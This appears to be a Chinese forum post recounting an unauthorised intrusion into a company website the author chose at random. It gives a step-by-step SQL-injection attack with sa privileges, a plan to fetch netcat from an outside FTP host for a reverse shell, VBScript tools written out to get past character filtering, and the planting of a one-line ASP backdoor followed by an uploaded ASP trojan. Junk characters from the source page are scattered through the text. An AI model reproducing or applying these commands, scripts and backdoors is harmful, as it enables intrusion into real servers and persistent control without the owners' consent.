作者:haicao [E.S.T]! {* W; L r/ `; [5 j$ H3 e
; `& e- Y) R& Z% g3 D8 O今天在网上看到一个动画,动画里说那些大公司的安全做的怎么怎么差,所以我便决定找个看看,在GOOGLE随便输入了"集团",搜索到的第一页随便点击就进了一家公司的网站。随便点了一个连接加了一个单引号
/ k) M) F7 v. k. g. M+ E) whttp://www.xxx.com.cn/gushi.asp?pid=8&cid=111'
# Y9 P# C: j! y9 J1 Q: \- ~晕,返回错误:
" g5 R8 \3 l9 F' ~Microsoft VBScript 编译器错误 错误 '800a03f6'
, L3 ~5 W* j- }; `$ J8 M( x2 K( G6 \2 }2 g
缺少 'End' 4 h' Q% y X1 }3 N" [! n
1 ^' t8 X( b/ j% A! V! k6 Z/iisHelp/common/500-100.asp,行242 # Q$ v8 i8 O1 x( q+ d6 ?" L
7 P* a$ W* G. Y6 L
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
6 {8 f( t i& O4 `( Q) M6 A- l% w6 N$ s' i% w3 d, F ] e' k* G
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。 - V: U$ p; o3 b v8 J1 W7 m5 s
! `( N2 H+ c5 W/inc/artid.inc,行8
: ]1 f, Q n* X; A& K返回的信息说明是SQL Server0 @5 o; \& R4 R# w C, a3 v
ping www.xxx.com.cn后返回IP:61.XX.XX.68通过IP可以直接访问这个网站,说明是独立的服务器。
& h9 a+ f! R' S; P4 G6 f. Q, j我一下来了兴致看来是家有钱的大公司,用NBSI检测了下这个连接,竟然是SA权限的!
. ^1 k1 v% J+ f8 U M2 D8 \* g$ v& n& @$ H1 m
* Z" P* k q' p
我用SUPERSCAN扫描了这台主机的开放端口只开放了80及8080端口(都是提供web服务,看来是装了_blank">防火墙,意料之中)。这样的话直接添加用户开3389什么都失去了意义了。只好重新理清头绪。
8 b9 e' O+ a+ L3 j4 q' ]首先想到的是用ECHO写一个ftp.txt文件然后执行ftp -s:ftp.txt来下载一个nc在NBSI里执行命令反向连接过来就可以得到它的系统权限了,但在用ECHO写文件时又出了问题了,我输入一条ECHO命令竟然执行了四次。如图我输入命令 echo open ftp.eviloctal.com>>e:\xxxweb\app\3.txt(e:\xxxweb为网站根目录)竟然往文件里写入了四次这样的话直接用ftp.txt下载文件肯定没戏。
/ Q7 }) j% p, T" u7 G! Q( j* A' O ~ ` A) ~
5 R6 w3 ]6 C3 u6 w8 s, t & _. n- n5 ]* q a) F
(特别提示:用NBSI执行命令的时侯最好不要勾选尝试返回结果,因为执行命令会很慢很慢,而用重定向符">>"把命令的执行结果重定向输出到web目录比如dir c:\可以写成dir c:\ >> e:\xxxweb\app\1.txt这样速度很快然后通过浏览器查看命令执行结果浏览http://www.xxx.com.cn/app/1.txt e:\xxxweb为网站的根目录): J9 G% |( y- Y3 O, j2 W
2 x: v9 q a5 a+ ]8 [5 ?3 \1 C
如果能把那个一句话的后门(服务端:)写到WEB目录就好办了,但是不管怎么ECHO %也被过滤掉了。在本地执行echo ^的文件,但在NBSI里执行时无论如何生成的文件中%被过滤了。内容变成:1 A4 W- B1 Q6 ^
& K- f0 z& M; ~( K0 g3 K7 G
<execute request("l")>
( _3 [5 Q1 c4 i% r9 i& @<execute request("l")>
+ R% R u- L+ d! z3 r+ u9 m<execute request("l")>
x1 l( X. `9 W5 N5 D<execute request("l")> , i9 m+ L2 [8 v0 n
% b* e+ q! H$ S7 a6 j7 S, P
, c7 e! N$ Y$ w( v9 e这样的话,就没办法直接写一句话的ASP服务端后门了。(内容为四句原因同上)我想到了先写一个VBS脚本然后把要写的文件内容作为参数传递给VBS脚本去处理生成相应的文件。' {2 V- g9 [4 |4 M4 M9 A% w. [6 z
写文件的脚本writefile.vbs(命令格式为cscript writefile.vbs "要写的字串" 目标文件)内容为:$ B9 V( i! ]& N# n1 Z/ F. J8 u/ z2 |3 c
on error resume next:x=1:
5 ~. N% x1 L" u: p, N4 A! o5 Lstr=replace(Wscript.Arguments(0),"==",vbcrlf): '将==替换回车" |9 ]0 ^, u9 x3 D9 x
str=replace(str,"**",""""): ‘将**替换为符号"- h3 i# }7 q% P
str=replace(str,"--",chr(38)): ‘将--替换为符号 &
& n4 j" ~, a% k. Sstr=replace(str,"@@",chr(37)): '将@@替换符号%, V# J5 W( }7 E- \/ g: I7 z3 `* u
Set fso = CreateObject("Scripting.FileSystemObject"):
# q( i6 E' @. @, n: }( h0 ySet a = fso.CreateTextFile(Wscript.Arguments(1),true): ‘创建文件,文件名为执行时给出的第二个参数
3 s7 k( v6 y/ k3 I! E+ dif x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:' C0 h- B4 B: \0 d- m' [/ p
这个文件得用ECHO命令把它写到服务器上xxx.vbe或xxx.vbs,然后用这个VBS写我们要的文件。(上面中因为像",%,&,回车符 是不能直接作为参数传递给脚本文件的,所以还需要对这些字符进行替换。下面的脚本trans.vbs将完成相反的过程)# q5 M* B: s7 t& h" P1 y- w4 e
简单解释一下:第一条语句是最重要的,容错语句不管后面的程序出了什么错都继续执行。其次是IF语句,为了避免多条语句重复向文件写入同样的内容用了一个标志若x=1才执行写文件,写完马上把x赋值为2。其次可能你会感到奇怪为什么每条语句后加了:,其实是因为我考虑到如果在同一行有多条相同的语句的时侯可以保证程序还能执行。比如:
& Q- G, U G+ F' r; C. rstr=replace(Wscript.Arguments(0),"==",vbcrlf):str=replace(Wscript.Arguments(0),"==",vbcrlf):
9 w* j! L. x" {- b* Y2 A若写成str=replace(Wscript.Arguments(0),"==",vbcrlf)
( Q( `9 J- u2 U5 d# R) g则一行显示多条相同语句时变成' |% b( p* C6 w6 c& e
str=replace(Wscript.Arguments(0),"==",vbcrlf)str=replace(Wscript.Arguments(0),"==",vbcrlf)+ N6 H' C4 A; W7 \& R% V! F
这样程序便不能正常执行了。
6 o5 H, ?6 p3 z# ?. p",%,&,回车符 是不能直接作为参数传递给脚本文件,容易看出用==代替了回车,用**代替了双引号,用--代替了&,用@@代替了%.在执行写文件得先把我们要写的文件比如转换成writefile.vbs可以接受的格式。用下面的脚本转换trans.vbs(命令格式为cscript trans.vbs 源文件 目标文件):; V$ d7 Q0 Q" T: Q* x3 x) G5 O1 e
on error resume next4 J- M4 ~& i- d
if Wscript.Arguments.count<>2 then ) _ h' B& { @2 J6 J5 t
wscript.echo "参数有误啦 格式为:cscript trans.vbs 源文件 目标文件"( k8 m2 a% m9 ~, H4 ~1 m
wscript.quit
- l+ Y& m2 Z k Z3 k6 v4 fend if& }. W5 Q* a5 u# S8 H. E
Set fso=CreateObject("Scripting.FileSystemObject")
0 ~. ~! z& U3 I# WSet a=fso.openTextFile(Wscript.Arguments(0))
" d4 z# r& O3 Z' Kstr=a.readall1 `0 i5 a- R. w" S
str=replace(str,"""","**") '把双引号替换成**
$ }2 J5 O/ v5 h# X3 X- G: e Sstr=replace(str,vbcrlf,"==") '把回车替换成==
% r% p7 X7 a. X' j' [str=replace(str,"&","--") '把&号替换成--7 a. b/ o* L7 j4 z
str=replace(str,"%","@@") '把%替换成@@9 v" m& r# W: ^' v4 K; F) ?
wscript.echo str
# Q5 z. C. A6 C, w" g1 tSet a=fso.CreateTextFile(Wscript.Arguments(1), True). ?6 L7 I& l" ~4 |; u
a.Write(str)# S2 T/ W( n: e0 F" }) {0 n
* }; m8 x y4 z$ C2 X1 e w- J: {在本地执行cscript trans.vbs one.txt onetrans.txt) o( _/ X) ^2 q, @1 X5 O% P
其中one.txt为我们的一句话后门内容为:+ a$ j+ p6 K& W6 L, _! C/ w
转换后内容存在onetrans.txt中内容变成转换后的:<@@execute request(**l**)@@>保存在文件onetrans.txt中。- g9 f# y: i6 R4 J
writefile.vbs的ECHO代码为:
0 o1 c+ p# O+ ^! J5 \% o3 lecho on error resume next:x=1:>>writefile.vbe p4 h. Y3 R7 H6 b
echo str=replace(Wscript.Arguments(0),"==",vbcrlf):>>writefile.vbe
4 m9 `+ B0 G ?4 S4 { b2 L3 fecho str=replace(str,"**",""""):>>writefile.vbe 8 ?7 P" {( ?" I% n
echo str=replace(str,"--",chr(38)):>>writefile.vbe . }* G/ K; \" C2 J7 l
echo str=replace(str,"@@",chr(37)):>>writefile.vbe
0 B; C/ k* u H5 gecho Set fso = CreateObject("Scripting.FileSystemObject"):>>writefile.vbe$ ?$ H: b# ~; a# S/ Q7 o4 g" j
echo Set a = fso.CreateTextFile(Wscript.Arguments(1),true):>>writefile.vbe
' D3 s- x! x$ j1 A6 [, e( kecho if x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:>>writefile.vbe2 u7 P8 H" r5 l. ?. L, W/ L
# h2 X6 I3 n2 b- N2 d, D把上面的命令一句句拿到NBSI的NB Commander 命令执行器上执行一下就在对方的系统目录下写进了一个文件writefile.vbe,接着就可以把一句话的服务器的后门写到对方WEB目录下了!命令为:& _1 \ o: U* L! E* I
cscript writefile.vbe "<@@execute request(**l**)@@>" d:\web\app\1.asp (注意当传递给脚本的参数中含空格时一定得用两个双引号括起来!)# p V0 Q4 @# r; f: {. |7 w
相应的地址为:http://www.xxx.com.cn/app/1.asp
$ [+ C, Q; Q- O把post.htm的form action指向这个地址我们就可以在本地把我们的木马上传到服务器上了!如图:
: I, d! c: t1 K
% ` y/ W; W3 F. U0 ^' m; E. y! s 1 K9 B% V* x1 T! ~0 T
执行post.htm在下面的文本框中粘贴一下我们用来保存文件的ASP木马。并点击upload当成功转向EST论坛时说明ASP木马上传成功了!
/ b! H* M' r* F- x$ c: b
! W5 B( h1 P3 P+ F* Q我很顺利的把保存文件的木马上传到了服务器上文件名为advv.asp.如图:
5 a* H. e. ]- {1 O2 J( Y9 d' U8 e# s6 h
我把这个木马加了验证所以必须得通过这个url才能顺利访问:
/ I& Z3 s/ t \4 x k! b/ |http://www.xxx.com.cn/app/advv.asp?id=haicao (当未加参数id=haicao时显示空页面) |